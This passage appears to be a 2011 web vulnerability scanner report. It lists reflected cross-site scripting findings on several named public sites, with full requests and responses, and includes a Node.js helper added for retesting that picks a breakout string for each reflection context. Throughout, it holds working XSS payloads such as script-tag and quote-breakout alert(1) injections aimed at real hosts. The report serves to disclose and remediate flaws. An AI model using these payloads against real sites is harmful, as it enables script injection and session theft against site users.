User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5124
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/styles/apptools.csse507e<script>alert(1)</script>60df3ed154 was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78363<script>alert(1)</script>31482200f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles78363<script>alert(1)</script>31482200f99/print.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:29 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/styles78363<script>alert(1)</script>31482200f99/print.css was not able to be displayed.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7876d<script>alert(1)</script>1b072629eeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/print.css7876d<script>alert(1)</script>1b072629eeb HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page ...[SNIP]... <p>We're sorry, but your request for http://apptools.com/styles/print.css7876d<script>alert(1)</script>1b072629eeb was not able to be displayed.</p> ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9fb5f<script>alert(1)</script>bb7775bca59 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=39fb5f<script>alert(1)</script>bb7775bca59&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload a97d8<script>alert(1)</script>9a0c4e010c5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338a97d8<script>alert(1)</script>9a0c4e010c5&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 29d7a<script>alert(1)</script>1b41605cfe3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=507003329d7a<script>alert(1)</script>1b41605cfe3&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 950d1<script>alert(1)</script>79857982068 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113950d1<script>alert(1)</script>79857982068&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 9641e<script>alert(1)</script>c02414cca98 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=590678989641e<script>alert(1)</script>c02414cca98&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7176f<script>alert(1)</script>cc305f915b3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=7176f<script>alert(1)</script>cc305f915b3& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:55 GMT
Date: Wed, 02 Feb 2011 15:31:55 GMT
Connection: close
Content-Length: 3603
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload def48<script>alert(1)</script>a050df307b6 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?query=xdef48<script>alert(1)</script>a050df307b6 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fbl=2; v=1; sessionid=352926924
The value of the term request parameter is copied into the HTML document as plain text between tags. The payload d17f0<script>alert(1)</script>b1b056eeebb was submitted in the term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?term={searchTerms}d17f0<script>alert(1)</script>b1b056eeebb&lang={language?}&form=opensearch HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:04 GMT
Vary: Accept-Encoding
Content-Length: 58
X-Blekko-PT: 9997f158d202984eeb76c315478564b1
1.83. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/2mdn.net/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b358d'-alert(1)-'f4b7b9879fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/2mdn.net/x22?b358d'-alert(1)-'f4b7b9879fc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:19:53 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:54 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=2mdn.net%2Fx22&b358d'-alert(1)-'f4b7b9879fc=1&p=30&d=1288898394&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
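The context determination in the issue detail above (the canary landed inside a single-quoted JavaScript string; in the next issue it lands inside a double-quoted attribute) can be reproduced offline from a captured response. The Node.js script below is an added example written for this page, not part of the Burp report or of boardreader.com's code. The sample bodies are constructed from the response fragments shown in issues 1.83 and 1.84 with an assumed benign canary (b358df4b7b9879fc) standing in for the attack payload, and all function names are assumptions.

```javascript
'use strict';

// Report which JavaScript string quote (if any) is still open at the end of a
// script fragment. Backslash escapes and // and /* */ comments are handled;
// template literals are not (assumption: this page's inline script has none).
function openJsQuote(js) {
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (quote) {
      if (c === '\\') { i++; continue; }          // skip the escaped character
      if (c === quote) quote = null;
      continue;
    }
    if (c === '/' && js[i + 1] === '/') {          // line comment
      const nl = js.indexOf('\n', i);
      if (nl === -1) return null;
      i = nl;
      continue;
    }
    if (c === '/' && js[i + 1] === '*') {          // block comment
      const end = js.indexOf('*/', i + 2);
      if (end === -1) return null;
      i = end + 1;
      continue;
    }
    if (c === '"' || c === "'") quote = c;
  }
  return quote;
}

// Report whether the end of an HTML fragment is inside a tag and, if so, which
// attribute quote is open.
function htmlState(html) {
  let inTag = false;
  let quote = null;
  for (const c of html) {
    if (!inTag) {
      if (c === '<') inTag = true;
    } else if (quote) {
      if (c === quote) quote = null;
    } else if (c === '"' || c === "'") {
      quote = c;
    } else if (c === '>') {
      inTag = false;
    }
  }
  return { inTag, quote };
}

// Find the canary in the response and classify the context it landed in. The
// breakout string is the payload shape that escapes that context, which is how
// the two payload families in this report were chosen.
function classifyReflection(body, canary) {
  const idx = body.indexOf(canary);
  if (idx === -1) return { context: 'not-reflected', quote: null, breakout: null };
  const before = body.slice(0, idx);
  const lower = before.toLowerCase();
  const open = lower.lastIndexOf('<script');
  const close = lower.lastIndexOf('</script');
  const gt = open === -1 ? -1 : before.indexOf('>', open);
  if (open > close && gt !== -1) {
    const q = openJsQuote(before.slice(gt + 1));
    return q
      ? { context: 'js-string', quote: q, breakout: q + '-alert(1)-' + q }
      : { context: 'js-code', quote: null, breakout: ';alert(1);//' };
  }
  const st = htmlState(before);
  if (st.inTag && st.quote) {
    return { context: 'html-attr', quote: st.quote, breakout: st.quote + '><script>alert(1)</script>' };
  }
  if (st.inTag) {
    return { context: 'html-attr-unquoted', quote: null, breakout: ' onmouseover=alert(1) ' };
  }
  return { context: 'html-text', quote: null, breakout: '<script>alert(1)</script>' };
}

// True when a context-specific payload came back byte for byte, i.e. the
// reflection is still exploitable after a fix attempt.
function reflectedUnmodified(body, payload) {
  return body.includes(payload);
}

// Constructed sample responses, assembled from the fragments shown in issues
// 1.83 and 1.84, with an assumed benign canary in place of the attack payload.
const CANARY = 'b358df4b7b9879fc';
const SAMPLE_SCRIPT_BODY = [
  '<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>',
  "var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=2mdn.net%2Fx22&" +
    CANARY + "=1&p=30&d=1288898394&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';",
  '</script></head><body></body></html>',
].join('\n');
const SAMPLE_ATTR_BODY =
  '<html><head><script>var x = 1;</script></head><body>' +
  '<a class="fp_adv" href="/a/2mdn.net%2Fx22?' + CANARY + '=1">advanced</a></body></html>';

// Stand-alone run: classify both samples and print what a retest should send.
for (const body of [SAMPLE_SCRIPT_BODY, SAMPLE_ATTR_BODY]) {
  const r = classifyReflection(body, CANARY);
  console.log(r.context, 'quote=' + JSON.stringify(r.quote), 'send:', r.breakout);
}
```

The retest loop is the same one the scanner ran: send an alphanumeric canary as a parameter name, classify where it came back, then send the breakout string for that context and check reflectedUnmodified on the second response. After a fix the canary should either disappear or be classified as html-text or js-string with the breakout string no longer present verbatim.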
1.84. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/2mdn.net/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebef7"><script>alert(1)</script>6f696982a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/2mdn.net/x22?ebef7"><script>alert(1)</script>6f696982a6d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:18:59 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:01 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/2mdn.net%2Fx22?ebef7"><script>alert(1)</script>6f696982a6d=1"> ...[SNIP]...
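Issues 1.83 and 1.84 are one defect seen at two sinks: the page rebuilds its query string from every request parameter, URL-encodes the q value but not the parameter names, and then pastes the result into a single-quoted JavaScript string and into a double-quoted href. The Node.js example below is added for this page and is not the application's code; the endpoint name is the one visible in the response, while the KNOWN_PARAMS allowlist and all function names are assumptions. It reconstructs the vulnerable rebuild beside a hardened one and shows why encodeURIComponent alone is not enough: it leaves the single quote and parentheses that the 1.83 payload relies on unencoded.

```javascript
'use strict';

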